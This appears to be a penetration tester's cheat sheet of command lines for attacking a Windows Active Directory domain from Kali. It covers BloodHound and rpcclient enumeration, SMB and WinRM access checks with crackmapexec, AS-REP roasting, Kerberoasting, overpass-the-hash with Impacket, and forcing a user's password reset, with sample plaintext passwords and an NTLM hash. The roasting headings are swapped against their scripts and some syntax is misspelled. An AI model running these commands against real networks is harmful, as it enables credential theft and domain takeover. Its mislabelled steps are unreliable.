Domain Reconnaissance on Kali
BloodHound
proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp
or
proxychains bloodhound-python3 -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab)
SMB Access
smbmap -H 10.9.20.10 -u kevin -p Passw0rd
WinRM Access
crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'
SMB Signing
crackmapexec smb 10.9.20.10
User
RPCClient
proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10
enumdomusers
queryuser 0x3601
Impacket
proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator
Group
RPCClient
enumdomgroups
querygroup 0x200
ASREPoasting
python3 impacket/example/GetUserSPNs.py red.com/ -no-pass -dc-ip 10.9.20.10 -userfile users.txt /fomat:hashcat
Kerberoasting
python3 impacket/example/GetNPUsers.py red.com/kevin:Passw0rd -dc-ip 10.9.20.10
Overpass the Hash/PTK
python3 impacket/example/getTGT.py red.com/kevin:Passw0rd
Reset AD Password
RPCClient
setuserinfo2 lawrencecohen 23 'Passw0rd'
Last updated